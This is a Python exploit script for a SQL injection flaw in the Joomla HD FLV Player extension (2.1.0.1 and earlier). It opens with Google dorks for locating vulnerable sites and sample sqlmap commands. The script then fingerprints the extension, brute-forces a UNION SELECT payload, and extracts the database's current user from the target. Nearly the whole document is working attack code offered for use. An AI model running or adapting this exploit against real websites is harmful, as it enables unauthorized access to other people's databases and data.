Joomla HD FLV 2.1.0.1 and below SQL Injection

1. #!/usr/bin/python
2. #
3. # Exploit Title : Joomla HD FLV 2.1.0.1 and below SQL Injection
4. #
5. # Exploit Author : amiral benz
6. # Dork google 1: inurl:/component/hdflvplayer/
7. # Dork google 2: inurl:com_hdflvplayer
8. #
9. # Date : 2013-6-10
10. #
11. # Poc:
12. # http://www.target.it/index.php?option=com_hdflvplayer&id=1[Sqli]
13. # http://www.target.it/index.php/component/hdflvplayer/182/title/Blabla-bleblo/id/6 [SQLi]/page/1 (url rewrite)
14. #
15. # Poc sqlmap:
16. # sqlmap -u "http://www.target.it/index.php?option=com_hdflvplayer&id=1" -p id --dbms mysql
17. # sqlmap -u "http://www.target.it/index.php/component/hdflvplayer/182/title/Blabla-bleblo/id/6*" --dbms mysql (url rewrite)
18. #
19. # http connection
20. import urllib, urllib2
21. # string manipulation
22. import re
23. # Errors management
24. import sys
25. # Args management
26. import optparse
27.  
28. # Check url
29. def checkurl(url):
30. if url[:8] != "https://" and url[:7] != "http://":
31. print('[X] You must insert http:// or https:// procotol')
32. sys.exit(1)
33. else:
34. return url
35.  
36. banner = """
37. _______ __ ___ ___ ______
38. | _ .-----.-----.--------| .---.-. | Y | _ \
39. |___| | _ | _ | | | _ | |. 1 |. | \
40. |. | |_____|_____|__|__|__|__|___._| |. _ |. | \
41. |: 1 | |: | |: 1 /
42. |::.. . | |::.|:. |::.. . /
43. `-------' `--- ---`------'
44. _______ ___ ___ ___ _______ __
45. | _ | | | Y | | _ | .---.-.--.--.-----.----.
46. |. 1___|. | |. | | |. 1 | | _ | | | -__| _|
47. |. __) |. |___|. | | |. ____|__|___._|___ |_____|__|
48. |: | |: 1 |: 1 | |: | |_____|
49. |::.| |::.. . |\:.. ./ |::.|
50. `---' `-------' `---' `---'
51. <= 2.1.0.1 Sql Injection
52.  
53. Written by:
54.  
55. amiral benz
56. """
57.  
58. commandList = optparse.OptionParser('usage: %prog -t URL')
59. commandList.add_option('-t', '--target', action="store",
60. help="Insert TARGET URL: http[s]://www.victim.com[:PORT]",
61. )
62.  
63. options, remainder = commandList.parse_args()
64.  
65. # Check args
66. if not options.target:
67. print(banner)
68. commandList.print_help()
69. sys.exit(1)
70.  
71. host = checkurl(options.target)
72.  
73. checkext = 0
74.  
75. evilurl = { '/index.php?option=com_hdflvplayer&id=-9404%20UNION%20ALL%20SELECT%20CONCAT%280x68306d336c34623174%2CIFNULL%28CAST%28CURRENT_USER%28%29%20AS%20CHAR%29%2C0x20%29%2C0x743162346c336d3068%29' : '/index.php?option=com_hdflvplayer&id=[SQLi]' }
76.  
77. char = "%2CNULL"
78. endurl = "%2CNULL%23"
79. bar = "#"
80.  
81. print(banner)
82.  
83. headers = {'User-Agent': 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36'}
84.  
85. sys.stdout.write("\r[+] Searching HD FLV Extension...: ")
86.  
87. try:
88. req = urllib2.Request(host+'/index.php?option=com_hdflvplayer&task=languagexml', None, headers)
89. response = urllib2.urlopen(req).readlines()
90.  
91. for line_version in response:
92.  
93. if not line_version.find("<?xml version=\"1.0\" encoding=\"utf-8\"?>") == -1:
94. checkext += 1
95. else:
96. checkext += 0
97.  
98. if checkext > 0:
99. sys.stdout.write("\r[+] Searching HD FLV Extension...: FOUND")
100. else:
101. sys.stdout.write("\r[+] Searching HD FLV Extension...: Not Found\n")
102. sys.exit(1)
103.  
104. except urllib2.HTTPError:
105. sys.stdout.write("\r[+] Searching HD FLV Extension...: Not Found\n")
106. sys.exit(1)
107.  
108. except urllib2.URLError as e:
109. print("\n[X] Connection Error: "+str(e.code))
110. sys.exit(1)
111.  
112. print("")
113.  
114. sys.stdout.write("\r[+] Checking Version: ")
115.  
116. try:
117. req = urllib2.Request(host+'/modules/mod_hdflvplayer/mod_hdflvplayer.xml', None, headers)
118. response = urllib2.urlopen(req).readlines()
119.  
120. for line_version in response:
121.  
122. if not line_version.find("<version>") == -1:
123.  
124. VER = re.compile('>(.*?)<').search(line_version).group(1)
125.  
126. sys.stdout.write("\r[+] Checking Version: "+str(VER))
127.  
128. except urllib2.HTTPError:
129. sys.stdout.write("\r[+] Checking Version: Unknown")
130.  
131. except urllib2.URLError as e:
132. print("\n[X] Connection Error: "+str(e.code))
133. sys.exit(1)
134.  
135. print("")
136.  
137. for exploiting, dork in evilurl.iteritems():
138.  
139. s = ""
140. barcount = ""
141. for a in range(1,100):
142.  
143. s += char
144. try:
145. req = urllib2.Request(host+exploiting+s+endurl, None, headers)
146. response = urllib2.urlopen(req).read()
147.  
148. if "h0m3l4b1t" in response:
149. print "\n[!] VULNERABLE"
150. current_user = re.compile('h0m3l4b1t(.*?)t1b4l3m0h').search(response).group(1)
151. print "[*] Username: "+str(current_user)
152. print ""
153. print "[*] 3v1l Url: "+host+exploiting+s+endurl
154. sys.exit(0)
155.  
156. except urllib2.HTTPError as e:
157. response = e.read()
158. if "h0m3l4b1t" in response:
159. print "\n[!] VULNERABLE"
160. current_user = re.compile('h0m3l4b1t(.*?)t1b4l3m0h').search(response).group(1)
161. print "[*] Username: "+str(current_user)
162. print ""
163. print "[*] 3v1l Url: "+host+exploiting+s+endurl
164. sys.exit(0)
165.  
166. except urllib2.URLError as e:
167. print("\n[X] Connection Error: "+str(e.code))
168. sys.exit(1)
169.  
170. barcount += bar
171. sys.stdout.write("\r[+] Exploiting...please wait: "+barcount)
172. sys.stdout.flush()
173.  
174. print "\n[X] Not vulnerable :("
175. print "[X] Try with tool like sqlmap and url "+host+"/index.php?option=com_hdflvplayer&id=1 (valid id number)"